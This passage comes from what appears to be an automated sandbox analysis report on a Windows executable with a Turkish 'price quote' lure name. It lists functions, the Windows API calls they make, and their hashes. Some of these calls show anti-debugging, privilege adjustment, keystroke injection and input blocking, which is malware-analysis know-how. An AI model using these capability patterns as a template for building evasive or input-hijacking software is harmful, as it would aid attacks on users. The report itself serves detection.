FindNextFileW.KERNEL32(00000000,?), ref: 009F5D17
FindClose.KERNEL32(?), ref: 009F5D5F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 6c0c564d11f1625f11f5344513fc3ab56d763fc4866626ce27d698d2a2cd6fe9
Instruction ID: acf38d53bec854ab4c45fc72113d6c739368baea9b56a8d74d313158dd537868
Opcode Fuzzy Hash: 6c0c564d11f1625f11f5344513fc3ab56d763fc4866626ce27d698d2a2cd6fe9
Instruction Fuzzy Hash: 6951BC74604A059FC714DF28C494EA6B7E8FF4A324F15855DEAAA8B3A1DB30EC05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 009B2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 009B271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009B2724
UnhandledExceptionFilter.KERNEL32(?), ref: 009B2731

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8ba52bad7979d20cdd48123285e0ef5abd01c7e2b8591b4f7a1236dec841f49f
Instruction ID: 5faf50c0785520b9c8b9b3e75b4b5630e667aff777cb4117f097ba8d24b5ed5d
Opcode Fuzzy Hash: 8ba52bad7979d20cdd48123285e0ef5abd01c7e2b8591b4f7a1236dec841f49f
Instruction Fuzzy Hash: 5431D5749412189BCB21DF68DD897DCB7B8EF48320F5041EAE41CA7260EB309F818F84

Uniqueness

Uniqueness Score: -1.00%

Function 009F51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009F51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009F5238
SetErrorMode.KERNEL32(00000000), ref: 009F52A1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: fadab8b5add0ef56bf10caf51c8e93142e030178088f77a8e8bdb0390aadccd3
Instruction ID: 244b04cb8c2b204da4caa19df6a83178826bdb6b4cbd28b8094c0c9ee108be8f
Opcode Fuzzy Hash: fadab8b5add0ef56bf10caf51c8e93142e030178088f77a8e8bdb0390aadccd3
Instruction Fuzzy Hash: 63314D75A005189FDB00DF94D884FEDBBB4FF49318F098199E905AB362DB31E856CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009E16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0099FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009A0668
Part of subcall function 0099FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009A0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
GetLastError.KERNEL32 ref: 009E174A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: c2af17970cc058e2aaaefbaa9217b6ae0713e3f045ad0c6c7050ec901e12d47b
Instruction ID: 2196d0b25f00810fb556aa61d57c482535158e127476e6f2e252759a41cf4d5c
Opcode Fuzzy Hash: c2af17970cc058e2aaaefbaa9217b6ae0713e3f045ad0c6c7050ec901e12d47b
Instruction Fuzzy Hash: EC1191B2414305AFD718DF54DC86EAAB7BDEB48B24B20852EE05697681EB71BC41CA24

Uniqueness

Uniqueness Score: -1.00%

Function 009ED5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009ED608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 009ED645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009ED650

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 9dd52c28d43539317d0d67db154463842ef82b2699f05b262703f9f7be91c1a7
Instruction ID: 711d4dab008f971491603637caba280dc1dc81a4a64debb3575c4d9a75ec14ec
Opcode Fuzzy Hash: 9dd52c28d43539317d0d67db154463842ef82b2699f05b262703f9f7be91c1a7
Instruction Fuzzy Hash: 27117C71E41228BBDB108F959C44FEFBBBCEB45B60F108111F914E7290C2704A018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 009E1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009E168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009E16A1
FreeSid.ADVAPI32(?), ref: 009E16B1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ceb697ad8f6cd2f36e8fba144e0f0946a37d1f83d5646420da12dcd5b6ab3b82
Instruction ID: b9cb9fc704ec4b73e5196bcc0de1719978f5a4cb3fc8a88f2e8976acfa3e21f1
Opcode Fuzzy Hash: ceb697ad8f6cd2f36e8fba144e0f0946a37d1f83d5646420da12dcd5b6ab3b82
Instruction Fuzzy Hash: BFF0F471990309FBDB00DFE49C89EAEBBBCEB08614F508565E501E2181E774AA448A50

Uniqueness

Uniqueness Score: -1.00%

Function 009A4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000,?,009B28E9), ref: 009A4D09
TerminateProcess.KERNEL32(00000000,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000,?,009B28E9), ref: 009A4D10
ExitProcess.KERNEL32 ref: 009A4D22

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 1f05861985d25584e36922e6f6a0de5bb3a857fbc8f0378d8127062ecd23b030
Instruction ID: 1c6597fcbca0c8a0b4d397faa68d16d0155fcf7fb9e2c3b17f7d1684effa6b1f
Opcode Fuzzy Hash: 1f05861985d25584e36922e6f6a0de5bb3a857fbc8f0378d8127062ecd23b030
Instruction Fuzzy Hash: EDE0B631040148BBCF11AF94DE0AA987B69EB827A5B108014FD198A162DB75EE42CA80

Uniqueness

Uniqueness Score: -1.00%

Function 009BC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 009BC36C

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: e5964a2a114593d48d6700ef5b2ed88c757c986950b3bcbe268f536bf7aa1809
Instruction ID: 3a8de1a91a917e655f1a9549b25a6412d5374105f63bcf1f64c7683734bd9840
Opcode Fuzzy Hash: e5964a2a114593d48d6700ef5b2ed88c757c986950b3bcbe268f536bf7aa1809
Instruction Fuzzy Hash: B04136B6900219ABCB209FB9CD88EFB77BCEBC4324F504269F915D7180E670DE818B50

Uniqueness

Uniqueness Score: -1.00%

Function 009DD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 009DD28C

Strings

X64, xrefs: 009DD2A8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: f1200cf39c883e5e16e3d8b9eb388311842f0e9bb7ef247dfec48b24b02ea5f4
Instruction ID: a3b068836e5c55bffcf7196f8fc2afe7dfa01b64c80b40e07a17dec0d5f719cb
Opcode Fuzzy Hash: f1200cf39c883e5e16e3d8b9eb388311842f0e9bb7ef247dfec48b24b02ea5f4
Instruction Fuzzy Hash: 85D0C9B484212DEACF94CB90DCC8DD9B37CBB04345F104552F146B2100D73495498F20

Uniqueness

Uniqueness Score: -1.00%

Function 009ACAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: ce3983a45759edc961097712dcbdacefb6b9c5d1677c656779f90e10e5ebe629
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: E1020CB1E002199FDF14CFA9C8806ADBBF5EF89324F254569D819EB384D731AD418BD4

Uniqueness

Uniqueness Score: -1.00%

Function 009F68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009F6918
FindClose.KERNEL32(00000000), ref: 009F6961

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e62d5922194a85b7eb1fccd739a27aefb73328b6fe9a64dafde5c6b5eca3fb93
Instruction ID: 5520028c039d8a2bb69a03d856b07932bd5452db160db1e67547d9e929a03017
Opcode Fuzzy Hash: e62d5922194a85b7eb1fccd739a27aefb73328b6fe9a64dafde5c6b5eca3fb93
Instruction Fuzzy Hash: B711D0756042009FD710DF69D484A26BBE4FF84328F14C699F5698F3A2C770EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009F37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A04891,?,?,00000035,?), ref: 009F37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A04891,?,?,00000035,?), ref: 009F37F4

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 69a0d5c6bba4f66824b39fb9e0244e29129fdbf750003c95966af9ed84c040a4
Instruction ID: e45ce7ab6a5aa19628a51a1843cc86d454d5794d6c48a327555e8e5dc1c4697a
Opcode Fuzzy Hash: 69a0d5c6bba4f66824b39fb9e0244e29129fdbf750003c95966af9ed84c040a4
Instruction Fuzzy Hash: FDF0E5B06042282AE72067A69C4DFEB7AAEEFC5771F004165F609D2281DAA09944C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 009EB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009EB25D
keybd_event.USER32(?,7694C0D0,?,00000000), ref: 009EB270

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 7bfe5e66b1314890d6df509d7dab8bfcf8f2546ef969bf312148237f58e4b217
Instruction ID: 4656370aaeb928d05c53b3271d23bc7dcc61ed9e660afb7f5f7ab733d2e0574d
Opcode Fuzzy Hash: 7bfe5e66b1314890d6df509d7dab8bfcf8f2546ef969bf312148237f58e4b217
Instruction Fuzzy Hash: 06F01D7184428DABDB06DFA1C805BEE7BB4FF04315F008409F965A5191C37986119F94

Uniqueness

Uniqueness Score: -1.00%

Function 009E10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009E11FC), ref: 009E10D4
CloseHandle.KERNEL32(?,?,009E11FC), ref: 009E10E9

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 876b9c241da65ebfee1f27a50024c98f9cd59a6f310b5eb278b978f6c44342ed
Instruction ID: bc600462ddede7f26dc5211f32617790f7e57ce59a73cf112aecbc1ef7a94a20
Opcode Fuzzy Hash: 876b9c241da65ebfee1f27a50024c98f9cd59a6f310b5eb278b978f6c44342ed
Instruction Fuzzy Hash: 22E04F32004610AFEB256B55FC05FB3B7A9EB04320F20C82DF4A5804B1DB626C90DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0098CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 009D0C40

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: f6e50eefe9f6e564a7cc57fb83b52458eec25fdee40af6750bbc60623e727380
Instruction ID: 237572a9824d55ab8fd4209d92c4b513b19f71347b284880e549e037fc4e3638
Opcode Fuzzy Hash: f6e50eefe9f6e564a7cc57fb83b52458eec25fdee40af6750bbc60623e727380
Instruction Fuzzy Hash: FD32ACB0900218DFDF14EF94D881BEDB7B9BF85308F14845AE806AB392D775AE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009B676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009B6766,?,?,00000008,?,?,009BFEFE,00000000), ref: 009B6998

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0589846c9924a94418393bc569f02ada4ffc7b0e1bd7267a500d671860a6b518
Instruction ID: 95cbc31b8f97a5e5a2ce95d299399d563fc073a329adf00a9a7e75889ae99538
Opcode Fuzzy Hash: 0589846c9924a94418393bc569f02ada4ffc7b0e1bd7267a500d671860a6b518
Instruction Fuzzy Hash: B9B14D32510608DFDB15CF28C586BA57BE0FF45364F298658E899CF2A2C739E991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0099B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 009D851F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ce1d3325800a2c2bcfb2852792884a9676a63e0ab1c75e76d3142233af8246bb
Instruction ID: a06bfc7cf025996b45e41b9cd067a3fd666539d06b60738a69a3b179495d4e68
Opcode Fuzzy Hash: ce1d3325800a2c2bcfb2852792884a9676a63e0ab1c75e76d3142233af8246bb
Instruction Fuzzy Hash: C8126E759002299FCF24CF58D9817EEB7B9FF48710F14819AE849EB252DB349A81DF90

Uniqueness

Uniqueness Score: -1.00%

Function 009FEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 009FEABD

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 680fd4a4a625debc67c7fa589097fe1f3f23aab5a402e2e388465d2a3440b898
Instruction ID: c27d842c3b6a84bfa84d5344db9792b03eb7ca354a9a61dbed5a025911bb38f2
Opcode Fuzzy Hash: 680fd4a4a625debc67c7fa589097fe1f3f23aab5a402e2e388465d2a3440b898
Instruction Fuzzy Hash: 68E01A752002049FD710EF59D804E9ABBE9AF98760F008416FD49C7361DA70E8418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009A09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009A03EE), ref: 009A09DA

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
